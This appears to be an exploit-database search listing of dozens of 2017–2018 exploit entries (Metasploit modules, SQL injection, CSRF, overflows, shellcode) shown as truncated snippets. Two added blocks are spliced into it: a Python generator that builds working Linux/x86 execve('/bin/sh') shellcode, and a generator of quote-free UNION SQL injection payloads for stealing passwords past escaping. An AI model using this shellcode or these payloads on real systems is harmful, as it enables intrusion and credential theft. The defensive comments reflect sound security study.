47885 matches found
HPE iMC - dbman 'RestartDB' Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ... 'Name' => 'HPE iMC dbman RestartDB Unauthenticated RCE', 'Description' => %q{ This module exploits a remote command execution vulnerability in Hewlett Packard...
Muviko 1.1 - SQL Injection
Exploit Title: Muviko 1.1 - Multiple SQL Injection Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Date: 09/01/2018 CVE: CVE-2017-17970 Vendor Homepage: https://www.muvikoscript.com Version: 1.1 Tested on: Mac OS...
WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation
Exploit Title: CMS Tree Page View CSRF, Privilege Escalation Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://eskapism.se/ Software Link: https://wordpress.org/plugins/cms-tree-page-view Version: 1.4 Tested on:...
Parity Browser < 1.6.10 - Bypass Same Origin Policy
VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-18016 Version: 0.3 Date: Jun 16th, 2017 Tag: parity same origin policy bypass webproxy token reuse Overview -------- Name: parity Vendor: paritytech References: https://parity.io/ 1 Version: 1.6.8 Latest Version...
HPE iMC - dbman 'RestoreDBase' Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ... 'Name' => 'HPE iMC dbman RestoreDBase Unauthenticated RCE', 'Description' => %q{ This module exploits a remote command execution vulnerability in Hewlett Packa...
Jungo Windriver 12.5.1 - Local Privilege Escalation
// ConsoleApplication1.cpp : Defines the entry point for the console application. #include "stdafx.h" #include <…> #include <…> #define device L"\\.\WINDRVR1251" #define SPRAYSIZE 30000 typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG...
Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check
/* The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings. Here's a snippet of the method. void Lowerer::LowerSetConcatStrMultiItem(IR::Instr *instr) { ... IR::IndirOpnd *dstLength = IR::IndirOpnd::New(concatStrOpnd,...
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting
Exploit Title: Joomla Plugin Easydiscuss inside the body, everything after the will be executed in the user’s browser. Works with every version up to 4.0.20 2. Proof of Concept Login with permissions to post a message, insert in the body and add any html code after that, whenever a user tries to...
WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery
Exploit Title: Social Media Widget by Acurax CSRF Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://www.acurax.com/ Software Link: https://wordpress.org/plugins/acurax-social-media-widget Version: 3.2.5 Tested on:...
WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure
Exploit Title: WordPress Plugin Service Finder Booking 3.2 - Local File Disclosure Google Dork: N/A Date: 09/01/2018 GMT+7 Exploit Author: telahdihapus Vendor Homepage: https://themeforest.net/user/aonetheme Software Link:...
SAP NetWeaver J2EE Engine 7.40 - SQL Injection
#!/usr/bin/env python # coding=utf-8 """ Author: Vahagn Vardanyan https://twitter.com/vah13 Bugs: CVE-2016-2386 SQL injection CVE-2016-2388 Information disclosure CVE-2016-1910 Crypto issue The following HTTP request is a simple PoC for the anonymous time-based SQL injection vulnerability CVE-2016-2386 in SAP...
WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery
Exploit Title: WordPress Download Manager CSRF Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: https://www.wpdownloadmanager.com/ Software Link: https://wordpress.org/plugins/download-manager Version: 2.9.60 Tested on:...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes). Shellcode exploit for Linux/x86 platform /* Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f...
Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)
Linux/x86 - execve(/bin/dash) Shellcode (30 bytes). Shellcode exploit for Linux/x86 platform / Description ; Title : exec /bin/dash - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/dash shell ; OS : Linux ; Arch :...
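Both execve shellcodes above work the same way: the target path is pushed onto the stack as little-endian dwords (the /bin/sh entry lists its two '//bin/sh' dwords, 0x68732f6e and 0x69622f2f, in push order), and esp then becomes the filename argument. The Python below is an added example, not code from either listed shellcode or their authors. It pads a path to a 4-byte multiple with leading '/' characters (so no NUL padding is needed), emits the dwords in push order, and wraps them in the plain, non-polymorphic execve stub so the result can be checked for NUL bytes. The 25-byte stub layout (xor eax/edx, push NUL, push path, mov ebx,esp, push NUL, push ebx, mov ecx,esp, mov al,0x0b, int 0x80) is the standard one and is an assumption here; it is not the polymorphic 53-byte or the 30-byte /bin/dash code from the listing.

```python
# Added example: encode a path as x86 "push imm32" dwords and assemble the
# classic Linux/x86 execve(path, [path], NULL) stub around it.
import struct


def path_to_push_dwords(path: str) -> list:
    """Pad `path` to a multiple of 4 with leading '/' (harmless in a Unix path,
    avoids NUL padding) and return the dwords in the order they must be
    pushed: last chunk first, so the string ends up in memory in order."""
    data = path.encode()
    if b"\x00" in data:
        raise ValueError("path must not contain NUL")
    pad = (-len(data)) % 4
    data = b"/" * pad + data
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]


def pushed_string(path: str) -> bytes:
    """Reconstruct what the pushes leave on the stack (lowest address first),
    i.e. the padded path the kernel will see at esp."""
    dwords = path_to_push_dwords(path)
    return b"".join(struct.pack("<I", d) for d in reversed(dwords))


def execve_shellcode(path: str = "/bin/sh") -> bytes:
    """Classic (assumed, non-polymorphic) execve stub; 25 bytes for /bin/sh."""
    code = b"\x31\xc0"                      # xor eax, eax
    code += b"\x31\xd2"                     # xor edx, edx   (envp = NULL)
    code += b"\x50"                         # push eax       (string terminator)
    for dw in path_to_push_dwords(path):
        code += b"\x68" + struct.pack("<I", dw)   # push imm32 (path chunk)
    code += b"\x89\xe3"                     # mov ebx, esp   (filename)
    code += b"\x50"                         # push eax       (argv terminator)
    code += b"\x53"                         # push ebx       (argv[0] = path)
    code += b"\x89\xe1"                     # mov ecx, esp   (argv)
    code += b"\xb0\x0b"                     # mov al, 0x0b   (SYS_execve)
    code += b"\xcd\x80"                     # int 0x80
    return code


def has_null(sc: bytes) -> bool:
    """Shellcode copied via string functions must not contain 0x00."""
    return b"\x00" in sc


if __name__ == "__main__":
    for p in ("/bin/sh", "/bin/dash"):
        sc = execve_shellcode(p)
        print(p, [hex(d) for d in path_to_push_dwords(p)],
              len(sc), "bytes, nulls:", has_null(sc))
```

The reversed push order is the part people get wrong: the dword for "n/sh" must be pushed before the one for "//bi" so that the lower address holds the start of the string. The NUL check matters because a byte of 0x00 inside a path chunk (or a chosen immediate) would truncate the payload when it is delivered through a C string.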
DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow
Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution Date: 2017-08-27 Exploit Author: Arris Huijgen Vendor Homepage: http://www.diskboss.com/ Software Link: http://www.diskboss.com/setups/diskbossentsetupv8.8.16.exe Version: Through 8.8.16 Tested on: Windows 7 SP1 x64, Windows...
Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Synology PhotoStation Multiple Vulnerabilities", 'Description' = %q This module exploits multiple vulnerabilities in Synology PhotoStation. When...
Multiple CPUs - Information Leak Using Speculative Execution
== INTRODUCTION == This is a bug report about a CPU security issue that affects processors by Intel, AMD and to some extent ARM. I have written a PoC for this issue that, when executed in userspace on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel, can leak around 2000 bytes per...
WordPress Plugin Events Calendar - 'event_id' SQL Injection
Exploit Title: Wichipi Events Calendar - SQL Injection Date: 09-01-2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: codecanyon.net/user/wachipi Version: 1.0 CVE-ID: CVE-2018-5315 Events Calendar allows you to easily add to your website a powerfu...
WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation
Exploit Title: Admin Menu Tree Page View CSRF, Privilege Escalation Discovery Date: 2017-12-12 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://eskapism.se/ Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view Version: 2.6.9...
Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches
/* The optimizations for memory operations may leave empty loops as follows: for (let i = 0; i < arr.length; i++) arr[i] = 0; Becomes: Memset(arr, 0, arr.length); for (let i = 0; i < arr.length; i++) {} // empty! These empty loops will be removed by "BackwardPass::RemoveEmptyLoopAfterMemOp". But this method just...
Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76, QueryProcessEnergyValues)' Kernel Stack Memory Disclosure
/* We have discovered that the nt!NtQueryInformationProcess system call invoked with the 76 information class discloses portions of uninitialized kernel stack memory to user-mode clients. The specific information class is handled by an internal nt!PsQueryProcessEnergyValues function. While we don'...
Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138, QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure
/* We have discovered that the nt!NtQuerySystemInformation system call invoked with the 138 information class discloses portions of uninitialized kernel pool memory to user-mode clients. The specific information class is handled by an internal nt!ExpQueryMemoryTopologyInformation function. While w...
Microsoft Edge Chakra JIT - Escape Analysis Bug
/* Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis Chakra fails to detect that "tmp" escapes the scope and allocates it on the stack. This may lead to dereferencing uninitialized stack values. PoC: */ function opt() { let tmp = ; tmp[0] = tmp; return tmp[0]; } function main() { for (let i = 0; i < 0x1000; i+...
Commvault Communications Service (cvd) - Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' class MetasploitModule ... 'Name' => 'Commvault Communications Service (cvd) Command Injection', 'Description' => %q{ This module exploits a command...
Microsoft Edge Chakra - 'asm.js' Out-of-Bounds Read
/* Here's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody. AsmJsVar *initSource = nullptr; if (decl->sxVar.pnodeInit->nop == knopName) { AsmJsSymbol *initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name, mFunction); if (initSym->GetSymbolType() == AsmJsSymbol::Variable) { // in this case we ar...
Microsoft Edge Chakra JIT - Op_MaxInAnArray and Op_MinInAnArray can Explicitly call User-Defined JavaScript Functions
/* 1. Call patterns like "Math.max.apply(Math, [1, 2, 3, 4, 5])" and "Math.max.apply(Math, arr)" can be optimized to directly call the method "JavascriptMath::MaxInAnArray" in the Inline Phase. 2. The method takes the original method "Math.max" as the first parameter and the arguments object as the seco...
Microsoft Office - 'Composite Moniker' Remote Code Execution
What? This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides. Download:...
BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt + ISR: ApparitionSec Vendor: ================= www.barcodewiz.com Product: ============= BarcodeWiz ActiveX Control 6.7...
Photos in Wifi 1.0.1 - Path Traversal
Document Title: =============== Photos in Wifi 1.0.1 iOS - Path Traversal Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1600 Release Date: ============= 2018-01-04 Vulnerability Laboratory ID VL-ID: ===================================...
VX Search Enterprise 10.1.12 - Denial of Service
Exploit Title: VX Search Enterprise Server v10.1.12 - Denial of Service Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.vxsearch.com/setups/vxsearchsrvsetupv10.1.12.exe Version: v10.1.12 Category: Windows Remote DoS CVE: CVE-2017-15662 Author Homepage: www.unixawy.com...
WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload
Exploit Title: WordPress LearnDash 2.5.3 Unauthenticated Arbitrary File Upload Date: 07-01-2018 Vendor Homepage: https://www.learndash.com/ Vendor Changelog: https://www.learndash.com/changelog/ Version: 2.5.3 Exploit Author: NinTechNet Author Advisory: http://nin.link/learndash/ Category: Webapp...
Microsoft Windows - Local XPS Print Spooler Sandbox Escape
Windows: Local XPS Print Spooler Sandbox Escape Platform: Windows 10 1703 and 1709 (not tested Windows 7 or 8.x) Class: Elevation of Privilege Summary: The local print spooler can be abused to create an arbitrary file from a low privilege application including one in an AC as well as a typical Edge...
Disk Pulse Enterprise 10.1.18 - Denial of Service
Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DoS Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.diskpulse.com/setups/diskpulsesrvsetupv10.1.18.exe Version: v10.1.18 Category: Windows Remote DoS CVE: CVE-2017-15663 Author Twitter: @eln1x Description In Disk Pul...
Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities
Synology Photostation Multiple Vulnerabilities Vendor: Synology Product: Synology Photostation Version: <= 6.7.2-3429 Website: http://www.synology.com (ASCII-art banner) GulfTech Research and Development Synology...
SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities
Document Title: =============== SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1725 Release Date: ============= 2018-01-06 Vulnerability Laboratory ID VL-ID:...
Vanilla < 2.1.5 - Cross-Site Request Forgery
Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432 Google Dork: NA Date: 7/1/2018 Contact: https://twitter.com/anandm47 website: https://anandtechzone.blogspot.in Exploit Author: Anand Meyyappan Vendor Homepage: https://open.vanillaforums.com Software Link:...
FiberHome LM53Q1 - Multiple Vulnerabilities
#!/usr/bin/python (ASCII-art banner) ...
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration Date: 01/05/2018 Exploit Author: Steve Kaun Vendor Homepage: https://www.synology.com Version: Before 6.1.3-15152 CVE : CVE-2017-9554 Previously this was identified by the developer and the disclosur...
Sync Breeze Enterprise 10.1.16 - Denial of Service
Exploit Title: Sync Breeze Enterprise Server v10.1.16 - Denial of Service Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.syncbreeze.com/setups/syncbreezesrvsetupv10.1.16.exe Version: v10.1.16 Category: Windows Remote DoS CVE: CVE-2017-15664 Author Twitter: @eln1x...
Android - Inter-Process munmap due to Race Condition in ashmem
The MemoryIntArray class allows processes to share an in-memory array of integers backed by an "ashmem" file descriptor. As the class implements the Parcelable interface, it can be inserted into a Parcel, and optionally placed in a Bundle and transferred via binder to remote processes. Instead of...
DiskBoss Enterprise 8.5.12 - Denial of Service
Exploit Title: DiskBoss Enterprise Server 8.5.12 - Denial of Service Date: 2017-10-20 Exploit Author: Ahmad Mahfouz Software Link: http://www.diskboss.com/setups/diskbosssrvsetupv8.5.12.exe Version: v10.1.16 Category: Windows Remote DoS CVE: CVE-2017-15665 Author Homepage: www.unixawy.com...
Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and CS_OWNDC Corrupts DC Cache
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1389&desc=6 Windows maintains a DC cache in win32kbase!gpDispInfo->pdceFirst. If you create multiple windows from a shared class while switching between CS_OWNDC and CS_CLASSDC, you can cause cache list entries to maintain references ...
Gespage 7.4.8 - SQL Injection
CVE-2017-7997 Gespage SQL Injection vulnerability Description Gespage is a web solution providing a printer portal. Official Website: http://www.gespage.com/ The web application does not properly filter several parameters sent by users, allowing authenticated SQL code injection Stacked Queries -...
GetGo Download Manager 5.3.0.2712 - 'Proxy' Buffer Overflow
Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712 Date: 01-02-2018 Tested on Windows 8 64 bits Exploit Author: devcoinfet Contact: https://twitter.com/wabefet Software Link: http://www.getgosoft.com/getgodm/ Category: webapps Attack Type: Remote Impac...
gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities
Exploit Title: GPS-SERVER.NET SAAS CMS Unfortunately each and every POST request in the CMS is going through the function mysql_real_escape_string(), which will add slashes before every quote in the payload. So you have to make sure your payload doesn't contain any quote. Fortunately, PHP is flexible enoug...
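The excerpt above makes a point worth seeing concretely: mysql_real_escape_string() only neutralises an injection when the escaped value is placed inside quotes. If the application concatenates it unquoted (a numeric context), the attacker simply writes a payload that contains no quote characters, replacing any needed string with a MySQL hex literal (0x...) or CHAR(). The Python below is an added example, not the advisory's exploit: it models the character set that function escapes (assuming MySQL's default backslash-escaping mode), a hypothetical vulnerable query with made-up table and column names, and shows that the quote-free payload passes through intact while the quoted one is mangled.

```python
# Added example: quote-free SQL injection payloads against an escaped but
# unquoted (numeric-context) parameter. Model code, not the CMS's own.


def mysql_real_escape_string(s: str) -> str:
    """Model of libmysql's escaping (assumed default mode, NO_BACKSLASH_ESCAPES
    off): backslash-escapes NUL, \\n, \\r, backslash, ', " and Ctrl-Z. Digits,
    spaces, operators and 0x.. literals are left untouched."""
    table = {
        "\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
        "'": "\\'", '"': '\\"', "\x1a": "\\Z",
    }
    return "".join(table.get(ch, ch) for ch in s)


def mysql_hex_literal(text: str) -> str:
    """MySQL treats 0x61646d696e as the string 'admin' in a string context,
    so a quoted literal can be replaced by one that contains no quotes."""
    return "0x" + text.encode().hex()


def mysql_char_literal(text: str) -> str:
    """Alternative quote-free form: CHAR(97,100,109,105,110)."""
    return "CHAR(" + ",".join(str(b) for b in text.encode()) + ")"


def decode_hex_literal(literal: str) -> str:
    """What the server will see for a 0x.. literal; used to verify encoding."""
    if not literal.startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode()


def vulnerable_query(event_id: str) -> str:
    """Constructed model of the vulnerable pattern: the value is escaped and
    then concatenated WITHOUT surrounding quotes. Table and column names are
    hypothetical."""
    return "SELECT title FROM events WHERE id=" + mysql_real_escape_string(event_id)


def union_payload(username: str, quote_free: bool) -> str:
    """UNION payload for the numeric context. In quote-free mode the string
    comparison uses a hex literal instead of a quoted 'username'."""
    literal = mysql_hex_literal(username) if quote_free else "'" + username + "'"
    return "1 UNION SELECT password FROM users WHERE username=" + literal


def payload_intact(event_id: str) -> bool:
    """True when escaping left the attacker's text unchanged, i.e. the final
    query is exactly what the attacker intended."""
    return vulnerable_query(event_id).endswith(event_id)


if __name__ == "__main__":
    for quote_free in (False, True):
        p = union_payload("admin", quote_free)
        print(f"quote_free={quote_free}: intact={payload_intact(p)}")
        print("  " + vulnerable_query(p))
```

The defensive reading is the same as the offensive one: escaping is not a substitute for a parameterised query, and any parameter used in a numeric position must be cast or validated as a number before it reaches the SQL string.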
VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ... 'Name' => 'VMware Workstation ALSA Config File Local Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in VMware Workstation Pr...
Cisco IOS - Remote Code Execution
#!/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting a remote code execution vulnerability in the SNMP service disclosed by Cisco Systems on June 29th 2017 - Descriptio...
Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes). Shellcode exploit for Linux/x86 platform /* Title: Linux/x86 - Reverse TCP Shell (/bin/sh) 127.1.1.1:8888/TCP Null-Free Shellcode (69 bytes) Description: Smallest /bin/sh Reverse TCP Shellcode (Null Free, No...
Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ... 'Name' => 'Ayukov NFTP FTP Client Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD...
Xplico - Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ... 'Name' => 'Xplico Remote Code Execution', 'Description' => %q{ This module exploits a command injection vulnerability. Unauthenticated users can register a new...